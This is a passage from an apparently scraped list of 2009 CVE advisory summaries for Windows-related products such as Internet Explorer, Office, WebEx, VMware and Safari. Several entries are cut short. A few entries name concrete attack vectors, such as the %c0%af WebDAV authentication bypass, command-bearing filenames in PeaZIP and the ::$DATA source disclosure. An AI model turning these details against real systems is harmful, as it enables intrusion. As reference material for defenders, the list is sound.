vectors involving a series of function calls that set this property, as demonstrated by (1) the chromehtml: protocol and (2) the aim: protocol. [CVE-2009-2954] Microsoft Internet Explorer 6.0.2900.2180 and earlier allows remote attackers to cause a denial of service (CPU consumption and application hang) via JavaScript code with a long string value for the hash property (aka location.hash), a related issue to CVE-2008-5715. [CVE-2009-2880] Buffer overflow in atrpui.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted WebEx Recording Format (WRF) file. [CVE-2009-2879] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2876 and CVE-2009-2878. [CVE-2009-2878] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2876 and CVE-2009-2879. [CVE-2009-2877] Stack-based buffer overflow in ataudio.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file. [CVE-2009-2876] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2878 and CVE-2009-2879. [CVE-2009-2875] Buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted WebEx Recording Format (WRF) file. [CVE-2009-2838] Integer overflow in QuickLook in Apple Mac OS X 10.5.8 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted Microsoft Office document that triggers a buffer overflow. [CVE-2009-2813] Samba 3.4 before 3.4.2, 3.3 before 3.3.8, 3.2 before 3.2.15, and 3.0.12 through 3.0.36, as used in the SMB subsystem in Apple Mac OS X 10.5.8 when Windows File Sharing is enabled, Fedora 11, and other operating systems, does not properly handle errors in resolving pathnames, which allows remote authenticated users to bypass intended sharing restrictions, and read, create, or modify files, in certain circumstances involving user accounts that lack home directories. [CVE-2009-2804] Integer overflow in ColorSync in Apple Mac OS X 10.4.11 and 10.5.8, and Safari before 4.0.4 on Windows, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted ColorSync profile embedded in an image, leading to a heap-based buffer overflow. [CVE-2009-2794] The Exchange Support component in Apple iPhone OS before 3.1, and iPhone OS before 3.1.1 for iPod touch, does not properly implement the "Maximum inactivity time lock" functionality, which allows local users to bypass intended Microsoft Exchange restrictions by choosing a large Require Passcode time value. [CVE-2009-2761] Unquoted Windows search path vulnerability in the scheduler (sched.exe) in Avira AntiVir, AntiVir Premium, Premium Security Suite, and AntiVir Professional might allow local users to gain privileges via a malicious antivir.exe file in the "C:\Program Files\avira\" directory. [CVE-2009-2717] The Abstract Window Toolkit (AWT) implementation in Sun Java SE 6 before Update 15 on Windows 2000 Professional does not provide a Security Warning Icon, which makes it easier for context-dependent attackers to trick a user into interacting unsafely with an untrusted applet. [CVE-2009-2711] XScreenSaver in Sun Solaris 9 and 10, OpenSolaris before snv_120, and X11 6.4.1 for Solaris 8, when the Xorg or Xnewt server is used, allows physically proximate attackers to obtain sensitive information by reading popup windows, which are displayed even when the screen is locked, a different vulnerability than CVE-2009-1276. [CVE-2009-2688] Multiple integer overflows in glyphs-eimage.c in XEmacs 21.4.22, when running on Windows, allow remote attackers to cause a denial of service (crash) or execute arbitrary code via (1) the tiff_instantiate function processing a crafted TIFF file, (2) the png_instantiate function processing a crafted PNG file, and (3) the jpeg_instantiate function processing a crafted JPEG file, all which trigger a heap-based buffer overflow. NOTE: the provenance of this information is unknown [CVE-2009-2681] Unspecified vulnerability in HP ProCurve Identity Driven Manager (IDM) A.02.x through A.02.03 and A.03.x through A.03.00, on Windows Server 2003 with IAS and Windows Server 2008 with NPS, allows local users to gain privileges via unknown vectors. [CVE-2009-2668] Microsoft Internet Explorer 6 through 6.0.2900.2180 and 7 through 7.0.6000.16473 allows remote attackers to cause a denial of service (CPU consumption) via an XML document composed of a long series of start-tags with no corresponding end-tags, a related issue to CVE-2009-1232. [CVE-2009-2628] The VMnc media codec in vmnc.dll in VMware Movie Decoder before 6.5.3 build 185404, VMware Workstation 6.5.x before 6.5.3 build 185404, VMware Player 2.5.x before 2.5.3 build 185404, and VMware ACE 2.5.x before 2.5.3 build 185404 on Windows does not properly handle certain small heights in video content, which might allow remote attackers to execute arbitrary code via a crafted AVI file that triggers heap memory corruption. [CVE-2009-2576] Microsoft Internet Explorer 6.0.2900.2180 and earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a long Unicode string argument to the write method, a related issue to CVE-2009-2479. NOTE: it was later reported that 7.0.6000.16473 and earlier are also affected. [CVE-2009-2536] Microsoft Internet Explorer 5 through 8 allows remote attackers to cause a denial of service (memory consumption and application crash) via a large integer value for the length property of a Select object, a related issue to CVE-2009-1692. [CVE-2009-2531] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-2530. [CVE-2009-2530] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-2531. [CVE-2009-2529] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, 7, and 8 does not properly handle argument validation for unspecified variables, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "HTML Component Handling Vulnerability." [CVE-2009-2528] GDI+ in Microsoft Office XP SP3 does not properly handle malformed objects in Office Art Property Tables, which allows remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption, aka "Memory Corruption Vulnerability." [CVE-2009-2521] Stack consumption vulnerability in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 7.0 allows remote authenticated users to cause a denial of service (daemon crash) via a list (ls) -R command containing a wildcard that references a subdirectory, followed by a .. (dot dot), aka "IIS FTP Service DoS Vulnerability." [CVE-2009-2518] Integer overflow in GDI+ in Microsoft Office XP SP3 allows remote attackers to execute arbitrary code via an Office document with a bitmap (aka BMP) image that triggers memory corruption, aka "Office BMP Integer Overflow Vulnerability." [CVE-2009-2512] The Web Services on Devices API (WSDAPI) in Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 does not properly process the headers of WSD messages, which allows remote attackers to execute arbitrary code via a crafted (1) message or (2) response, aka "Web Services on Devices API Memory Corruption Vulnerability." [CVE-2009-2506] Integer overflow in the text converters in Microsoft Office Word 2002 SP3 and 2003 SP3 [CVE-2009-2497] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0, 2.0 SP1, 2.0 SP2, 3.5, and 3.5 SP1, and Silverlight 2, does not properly handle interfaces, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted Silverlight application, (3) a crafted ASP.NET application, or (4) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Vulnerability." [CVE-2009-2496] Heap-based buffer overflow in the Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 SP1, and Office Small Business Accounting 2006 allows remote attackers to execute arbitrary code via unspecified parameters to unknown methods, aka "Office Web Components Heap Corruption Vulnerability." [CVE-2009-2495] The Active Template Library (ATL) in Microsoft Visual Studio .NET 2003 SP1, Visual Studio 2005 SP1 and 2008 Gold and SP1, and Visual C++ 2005 SP1 and 2008 Gold and SP1 does not properly enforce string termination, which allows remote attackers to obtain sensitive information via a crafted HTML document with an ATL (1) component or (2) control that triggers a buffer over-read, related to ATL headers and buffer allocation, aka "ATL Null String Vulnerability." [CVE-2009-2493] The Active Template Library (ATL) in Microsoft Visual Studio .NET 2003 SP1, Visual Studio 2005 SP1 and 2008 Gold and SP1, and Visual C++ 2005 SP1 and 2008 Gold and SP1 [CVE-2009-2479] Mozilla Firefox 3.0.x, 3.5, and 3.5.1 on Windows allows remote attackers to cause a denial of service (uncaught exception and application crash) via a long Unicode string argument to the write method. NOTE: this was originally reported as a stack-based buffer overflow. NOTE: on Linux and Mac OS X, a crash resulting from this long string reportedly occurs in an operating-system library, not in Firefox. [CVE-2009-2445] Oracle iPlanet Web Server (formerly Sun Java System Web Server or Sun ONE Web Server) 6.1 before SP12, and 7.0 through Update 6, when running on Windows, allows remote attackers to read arbitrary JSP files via an alternate data stream syntax, as demonstrated by a .jsp::$DATA URI. [CVE-2009-2433] Stack-based buffer overflow in the AddFavorite method in Microsoft Internet Explorer allows remote attackers to cause a denial of service (application crash) and possibly have unspecified other impact via a long URL in the first argument. [CVE-2009-2420] Apple Safari 3.2.3 does not properly implement the file: protocol handler, which allows remote attackers to read arbitrary files or cause a denial of service (launch of multiple Windows Explorer instances) via vectors involving an unspecified HTML tag, possibly a related issue to CVE-2009-1703. [CVE-2009-2411] Multiple integer overflows in the libsvn_delta library in Subversion before 1.5.7, and 1.6.x before 1.6.4, allow remote authenticated users and remote Subversion servers to execute arbitrary code via an svndiff stream with large windows that trigger a heap-based buffer overflow, a related issue to CVE-2009-2412. [CVE-2009-2350] Microsoft Internet Explorer 6.0.2900.2180 and earlier does not block javascript: URIs in Refresh headers in HTTP responses, which allows remote attackers to conduct cross-site scripting (XSS) attacks via vectors related to (1) injecting a Refresh header or (2) specifying the content of a Refresh header, a related issue to CVE-2009-1312. [CVE-2009-2261] PeaZIP 2.6.1, 2.5.1, and earlier on Windows allows user-assisted remote attackers to execute arbitrary commands via a .zip archive with a .txt file whose name contains \| (pipe) characters and a command. [CVE-2009-2069] Microsoft Internet Explorer before 8 displays a cached certificate for a (1) 4xx or (2) 5xx CONNECT response page returned by a proxy server, which allows man-in-the-middle attackers to spoof an arbitrary https site by letting a browser obtain a valid certificate from this site during one request, and then sending the browser a crafted 502 response page upon a subsequent request. [CVE-2009-2064] Microsoft Internet Explorer 8, and possibly other versions, detects http content in https web pages only when the top-level frame uses https, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying an http page to include an https iframe that references a script file on an http site, related to "HTTP-Intended-but-HTTPS-Loadable (HPIHSL) pages." [CVE-2009-2057] Microsoft Internet Explorer before 8 uses the HTTP Host header to determine the context of a document provided in a (1) 4xx or (2) 5xx CONNECT response from a proxy server, which allows man-in-the-middle attackers to execute arbitrary web script by modifying this CONNECT response, aka an "SSL tampering" attack. [CVE-2009-2027] The Installer in Apple Safari before 4.0 on Windows allows local users to gain privileges by checking a box that specifies an immediate launch of the application after installation, related to an unspecified compression method. [CVE-2009-1919] Microsoft Internet Explorer 5.01 SP4 and 6 SP1 [CVE-2009-1918] Microsoft Internet Explorer 5.01 SP4 and 6 SP1 [CVE-2009-1917] Microsoft Internet Explorer 6 SP1 [CVE-2009-1805] Unspecified vulnerability in the VMware Descheduled Time Accounting driver in VMware Workstation 6.5.1 and earlier, VMware Player 2.5.1 and earlier, VMware ACE 2.5.1 and earlier, VMware Server 1.x before 1.0.9 build 156507 and 2.x before 2.0.1 build 156745, VMware Fusion 2.x before 2.0.2 build 147997, VMware ESXi 3.5, and VMware ESX 3.0.2, 3.0.3, and 3.5, when the Descheduled Time Accounting Service is not running, allows guest OS users on Windows to cause a denial of service via unknown vectors. [CVE-2009-1783] Multiple FRISK Software F-Prot anti-virus products, including Antivirus for Exchange, Linux on IBM zSeries, Linux x86 File Servers, Linux x86 Mail Servers, Linux x86 Workstations, Solaris Mail Servers, Antivirus for Windows, and others, allow remote attackers to bypass malware detection via a crafted CAB archive. [CVE-2009-1782] Multiple F-Secure anti-virus products, including Anti-Virus for Microsoft Exchange 7.10 and earlier [CVE-2009-1761] The message engine in CA ARCserve Backup r12.0 and r12.0 SP1 for Windows allows remote attackers to cause a denial of service (crash) via (1) an invalid 0x13 message, which is not properly handled in the ASCORE module, or (2) a 0x3B message with invalid stub data that triggers an RPC marshalling error. [CVE-2009-1716] CFNetwork in Apple Safari before 4.0 on Windows does not properly protect the temporary files created for downloads, which allows local users to obtain sensitive information by reading these files. [CVE-2009-1707] Race condition in the Reset Safari implementation in Apple Safari before 4.0 on Windows might allow local users to read stored web-site passwords via unspecified vectors. [CVE-2009-1706] The Private Browsing feature in Apple Safari before 4.0 on Windows does not remove cookies from the alternate cookie store in unspecified circumstances upon (1) disabling of the feature or (2) exit of the application, which makes it easier for remote web servers to track users via a cookie. [CVE-2009-1705] CoreGraphics in Apple Safari before 4.0 on Windows does not properly use arithmetic during automatic hinting of TrueType fonts, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted font data. [CVE-2009-1628] Stack-based buffer overflow in mnet.exe in Unisys Business Information Server (BIS) 10 and 10.1 on Windows allows remote attackers to execute arbitrary code via a crafted TCP packet. [CVE-2009-1565] vmnc.dll in the VMnc media codec in VMware Movie Decoder before 6.5.4 Build 246459 on Windows, and the movie decoder in VMware Workstation 6.5.x before 6.5.4 build 246459, VMware Player 2.5.x before 2.5.4 build 246459, and VMware Server 2.x on Windows, allows remote attackers to execute arbitrary code via an AVI file with crafted HexTile-encoded video chunks that trigger heap-based buffer overflows, related to "integer truncation errors." [CVE-2009-1564] Heap-based buffer overflow in vmnc.dll in the VMnc media codec in VMware Movie Decoder before 6.5.4 Build 246459 on Windows, and the movie decoder in VMware Workstation 6.5.x before 6.5.4 build 246459, VMware Player 2.5.x before 2.5.4 build 246459, and VMware Server 2.x on Windows, allows remote attackers to execute arbitrary code via an AVI file with crafted video chunks that use HexTile encoding. [CVE-2009-1547] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via a crafted data stream header that triggers memory corruption, aka "Data Stream Header Corruption Vulnerability." [CVE-2009-1542] The Virtual Machine Monitor (VMM) in Microsoft Virtual PC 2004 SP1, 2007, and 2007 SP1, and Microsoft Virtual Server 2005 R2 SP1, does not enforce CPU privilege-level requirements for all machine instructions, which allows guest OS users to execute arbitrary kernel-mode code and gain privileges within the guest OS via a crafted application, aka "Virtual PC and Virtual Server Privileged Instruction Decoding Vulnerability." [CVE-2009-1536] ASP.NET in Microsoft .NET Framework 2.0 SP1 and SP2 and 3.5 Gold and SP1, when ASP 2.0 is used in integrated mode on IIS 7.0, does not properly manage request scheduling, which allows remote attackers to cause a denial of service (daemon outage) via a series of crafted HTTP requests, aka "Remote Unauthenticated Denial of Service in ASP.NET Vulnerability." [CVE-2009-1535] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.1 and 6.0 allows remote attackers to bypass URI-based protection mechanisms, and list folders or read, create, or modify files, via a %c0%af (Unicode / character) at an arbitrary position in the URI, as demonstrated by inserting %c0%af into a "/protected/" initial pathname component to bypass the password protection on the protected\ folder, aka "IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1122. [CVE-2009-1534] Buffer overflow in the Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2000 Web Components SP3, Office XP Web Components SP3, BizTalk Server 2002, and Visual Studio .NET 2003 SP1 allows remote attackers to execute arbitrary code via crafted property values, aka "Office Web Components Buffer Overflow Vulnerability." [CVE-2009-1522] The IBM Tivoli Storage Manager (TSM) client 5.5.0.0 through 5.5.1.17 on AIX and Windows, when SSL is used, allows remote attackers to conduct unspecified man-in-the-middle attacks and read arbitrary files via unknown vectors. [CVE-2009-1491] McAfee GroupShield for Microsoft Exchange on Exchange Server 2000, and possibly other anti-virus or anti-spam products from McAfee or other vendors, does not scan X- headers for malicious content, which allows remote attackers to bypass virus detection via a crafted message, as demonstrated by a message with an X-Testing header and no message body. [CVE-2009-1473] The (1) Windows and (2) Java client programs for the ATEN KH1516i IP KVM switch with firmware 1.0.063 and the KN9116 IP KVM switch with firmware 1.1.104 do not properly use RSA cryptography for a symmetric session-key negotiation, which makes it easier for remote attackers to (a) decrypt network traffic, or (b) conduct man-in-the-middle attacks, by repeating unspecified "client-side calculations." [CVE-2009-1419] Unspecified vulnerability in HP Discovery & Dependency Mapping Inventory (DDMI) 2.0.0 through 2.52, 7.50, and 7.51 on Windows allows remote attackers to access DDMI agents via unknown vectors. [CVE-2009-1394] Stack-based buffer overflow in Motorola Timbuktu Pro 8.6.5 on Windows allows remote attackers to execute arbitrary code by sending a long malformed string over the PlughNTCommand named pipe. [CVE-2009-1348] The AV engine before DAT 5600 in McAfee VirusScan, Total Protection, Internet Security, SecurityShield for Microsoft ISA Server, Security for Microsoft Sharepoint, Security for Email Servers, Email Gateway, and Active Virus Defense allows remote attackers to bypass virus detection via (1) an invalid Headflags field in a malformed RAR archive, (2) an invalid Packsize field in a malformed RAR archive, or (3) an invalid Filelength field in a malformed ZIP archive. [CVE-2009-1276] XScreenSaver in Sun Solaris 10 and OpenSolaris before snv_109, and Solaris 8 and 9 with GNOME 2.0 or 2.0.2, allows physically proximate attackers to obtain sensitive information by reading popup windows, which are displayed even when the screen is locked, as demonstrated by Thunderbird new-mail notifications. [CVE-2009-1267] Unspecified vulnerability in the LDAP dissector in Wireshark 0.99.2 through 1.0.6, when running on Windows, allows remote attackers to cause a denial of service (crash) via unknown attack vectors. [CVE-2009-1233] Apple Safari 3.2.2 and 4 Beta on Windows allows remote attackers to cause a denial of service (application crash) via an XML document containing many nested A elements. [CVE-2009-1161] Directory traversal vulnerability in the TFTP service in Cisco CiscoWorks Common Services (CWCS) 3.0.x through 3.2.x on Windows, as used in Cisco Unified Service Monitor, Security Manager, TelePresence Readiness Assessment Manager, Unified Operations Manager, Unified Provisioning Manager, and other products, allows remote attackers to access arbitrary files via unspecified vectors. [CVE-2009-1140] Microsoft Internet Explorer 5.01 SP4 [CVE-2009-1137] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0223, CVE-2009-0226, and CVE-2009-0227. [CVE-2009-1136] The Microsoft Office Web Components Spreadsheet ActiveX control (aka OWC10 or OWC11), as distributed in Office XP SP3 and Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 Gold and SP1, and Office Small Business Accounting 2006, when used in Internet Explorer, allows remote attackers to execute arbitrary code via a crafted call to the msDataSourceObject method, as exploited in the wild in July and August 2009, aka "Office Web Components HTML Script Vulnerability." [CVE-2009-1135] Microsoft Internet Security and Acceleration (ISA) Server 2006 Gold and SP1, when Radius OTP is enabled, uses the HTTP-Basic authentication method, which allows remote attackers to gain the privileges of an arbitrary account, and access published web pages, via vectors involving attempted access to a network resource behind the ISA Server, aka "Radius OTP Bypass Vulnerability." [CVE-2009-1134] Excel in 2007 Microsoft Office System SP1 and SP2 [CVE-2009-1131] Multiple stack-based buffer overflows in Microsoft Office PowerPoint 2000 SP3 allow remote attackers to execute arbitrary code via a large amount of data associated with unspecified atoms in a PowerPoint file that triggers memory corruption, aka "Data Out of Bounds Vulnerability." [CVE-2009-1130] Heap-based buffer overflow in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3, and PowerPoint in Microsoft Office 2004 for Mac, allows remote attackers to execute arbitrary code via a crafted structure in a Notes container in a PowerPoint file that causes PowerPoint to read more data than was allocated when creating a C++ object, leading to an overwrite of a function pointer, aka "Heap Corruption Vulnerability." [CVE-2009-1129] Multiple stack-based buffer overflows in the PowerPoint 95 importer (PP7X32.DLL) in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allow remote attackers to execute arbitrary code via an inconsistent record length in sound data in a file that uses a PowerPoint 95 (PPT95) native file format, aka "PP7 Memory Corruption Vulnerability," a different vulnerability than CVE-2009-1128. [CVE-2009-1128] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 95 native file format, leading to memory corruption, aka "PP7 Memory Corruption Vulnerability," a different vulnerability than CVE-2009-1129. [CVE-2009-1044] Mozilla Firefox 3.0.7 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors related to the _moveToEdgeShift XUL tree method, which triggers garbage collection on objects that are still in use, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009. [CVE-2009-1011] Unspecified vulnerability in the Outside In Technology component in Oracle Application Server 8.2.2 and 8.3.0 allows local users to affect confidentiality, integrity, and availability, related to HTML. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on reliable researcher claims that this issue is for multiple integer overflows in a function that parses an optional data stream within a Microsoft Office file, leading to a heap-based buffer overflow. [CVE-2009-0954] Heap-based buffer overflow in Apple QuickTime before 7.6.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a movie file containing crafted Clipping Region (CRGN) atom types. [CVE-2009-0944] The Microsoft Office Spotlight Importer in Spotlight in Apple Mac OS X 10.4.11 and 10.5 before 10.5.7 does not properly validate Microsoft Office files, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a file that triggers memory corruption. [CVE-2009-0901] The Active Template Library (ATL) in Microsoft Visual Studio .NET 2003 SP1, Visual Studio 2005 SP1 and 2008 Gold, and Visual C++ 2005 SP1 and 2008 Gold and SP1 [CVE-2009-0894] Heap-based buffer overflow in the decoder_create function in the initialization functionality in xvidcore/src/decoder.c in Xvid before 1.2.2, as used by Windows Media Player and other applications, allows remote attackers to execute arbitrary code via vectors involving the DirectShow (aka DShow) frontend and improper handling of the XVID_ERR_MEMORY return code during processing of a crafted movie file. NOTE: some of these details are obtained from third party information. [CVE-2009-0893] Multiple heap-based buffer overflows in xvidcore/src/decoder.c in the xvidcore library in Xvid before 1.2.2, as used by Windows Media Player and other applications, allow remote attackers to execute arbitrary code by providing a crafted macroblock (aka MBlock) number in a video stream in a crafted movie file that triggers heap memory corruption, related to a "missing resync marker range check" and the (1) decoder_iframe, (2) decoder_pframe, and (3) decoder_bframe functions. [CVE-2009-0880] Directory traversal vulnerability in the CIM server in IBM Director before 5.20.3 Service Update 2 on Windows allows remote attackers to load and execute arbitrary local DLL code via a .. (dot dot) in a /CIMListener/ URI in an M-POST request. [CVE-2009-0879] The CIM server in IBM Director before 5.20.3 Service Update 2 on Windows allows remote attackers to cause a denial of service (daemon crash) via a long consumer name, as demonstrated by an M-POST request to a long /CIMListener/ URI. [CVE-2009-0869] Buffer overflow in the client in IBM Tivoli Storage Manager (TSM) HSM 5.3.2.0 through 5.3.5.0, 5.4.0.0 through 5.4.2.5, and 5.5.0.0 through 5.5.1.4 on Windows allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors. [CVE-2009-0841] Directory traversal vulnerability in mapserv.c in mapserv in MapServer 4.x before 4.10.4 and 5.x before 5.2.2, when running on Windows with Cygwin, allows remote attackers to create arbitrary files via a .. (dot dot) in the id parameter. [CVE-2009-0671] REJECT Format string vulnerability in the University of Washington (UW) c-client library, as used by the UW IMAP toolkit imap-2007d and other applications, allows remote attackers to execute arbitrary code via format string specifiers in the initial request to the IMAP port (143/tcp). NOTE: Red Hat has disputed the vulnerability, stating "The Red Hat Security Response Team have been unable to confirm the existence of this format string vulnerability in the toolkit, and the sample published exploit is not complete or functional." CVE agrees that the exploit contains syntax errors and uses Unix-only include files while invoking Windows functions. [CVE-2009-0655] Lenovo Veriface III allows physically proximate attackers to login to a Windows account by presenting a "plain image" of the authorized user. [CVE-2009-0647] msnmsgr.exe in Windows Live Messenger (WLM) 2009 build 14.0.8064.206, and other 14.0.8064.x builds, allows remote attackers to cause a denial of service (application crash) via a modified header in a packet, as possibly demonstrated by a UTF-8.0 value of the charset field in the Content-Type header line. NOTE: this has been reported as a format string vulnerability by some sources, but the provenance of that information is unknown. [CVE-2009-0612] Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 3.x and InterScan Web Security Suite (IWSS) 3.x, when basic authorization is enabled on the standalone proxy, forwards the Proxy-Authorization header from Windows Media Player, which allows remote web servers to obtain credentials by offering a media stream and then capturing this header. [CVE-2009-0601] Format string vulnerability in Wireshark 0.99.8 through 1.0.5 on non-Windows platforms allows local users to cause a denial of service (application crash) via format string specifiers in the HOME environment variable. [CVE-2009-0566] Microsoft Office Publisher 2007 SP1 does not properly calculate object handler data for Publisher files, which allows remote attackers to execute arbitrary code via a crafted file in a legacy format that triggers memory corruption, aka "Pointer Dereference Vulnerability." [CVE-2009-0565] Buffer overflow in Microsoft Office Word 2000 SP3, 2002 SP3, and 2007 SP1 and SP2 [CVE-2009-0563] Stack-based buffer overflow in Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-0562] The Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 SP1, and Office Small Business Accounting 2006 does not properly allocate memory, which allows remote attackers to execute arbitrary code via unspecified vectors that trigger "system state" corruption, aka "Office Web Components Memory Allocation Vulnerability." [CVE-2009-0561] Integer overflow in Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0560] Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0559] Stack-based buffer overflow in Excel in Microsoft Office 2000 SP3 and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted Excel file with a malformed record object, aka "String Copy Stack-Based Overrun Vulnerability." [CVE-2009-0558] Array index error in Excel in Microsoft Office 2000 SP3 and Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac, allows remote attackers to execute arbitrary code via a crafted Excel file with a malformed record object, aka "Array Indexing Memory Corruption Vulnerability." [CVE-2009-0557] Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0556] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3, and PowerPoint in Microsoft Office 2004 for Mac, allows remote attackers to execute arbitrary code via a PowerPoint file with an OutlineTextRefAtom containing an an invalid index value that triggers memory corruption, as exploited in the wild in April 2009 by Exploit:Win32/Apptom.gen, aka "Memory Corruption Vulnerability." [CVE-2009-0549] Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0537] Integer overflow in the fts_build function in fts.c in libc in (1) OpenBSD 4.4 and earlier and (2) Microsoft Interix 6.0 build 10.0.6030.0 allows context-dependent attackers to cause a denial of service (application crash) via a deep directory tree, related to the fts_level structure member, as demonstrated by (a) du, (b) rm, (c) chmod, and (d) chgrp on OpenBSD [CVE-2009-0522] Adobe Flash Player 9.x before 9.0.159.0 and 10.x before 10.0.22.87 on Windows allows remote attackers to trick a user into visiting an arbitrary URL via an unspecified manipulation of the "mouse pointer display," related to a "Clickjacking attack." [CVE-2009-0438] IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 on Windows allows remote attackers to bypass "Authorization checking" and obtain sensitive information from JSP pages via a crafted request. NOTE: this is probably a duplicate of CVE-2008-5412. [CVE-2009-0437] The Installation Factory installation process for IBM WebSphere Application Server (WAS) 6.0.2 on Windows, when WAS is registered as a Windows service, allows local users to obtain sensitive information by reading the logs/instconfigifwas6.log log file. [CVE-2009-0419] Microsoft XML Core Services, as used in Microsoft Expression Web, Office, Internet Explorer 6 and 7, and other products, does not properly restrict access from web pages to Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly protection mechanism. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2008-4033. [CVE-2009-0389] Multiple insecure method vulnerabilities in the Web On Windows (WOW) ActiveX control in WOW ActiveX 2 allow remote attackers to (1) create and overwrite arbitrary files via the WriteIniFileString method, (2) execute arbitrary programs via the ShellExecute method, (3) read from the registry via unspecified vectors, and (4) write to the registry via unspecified vectors. NOTE: vectors 1 and 2 can be used together to execute arbitrary code. [CVE-2009-0376] Heap-based buffer overflow in a DLL file in RealNetworks RealPlayer 10, 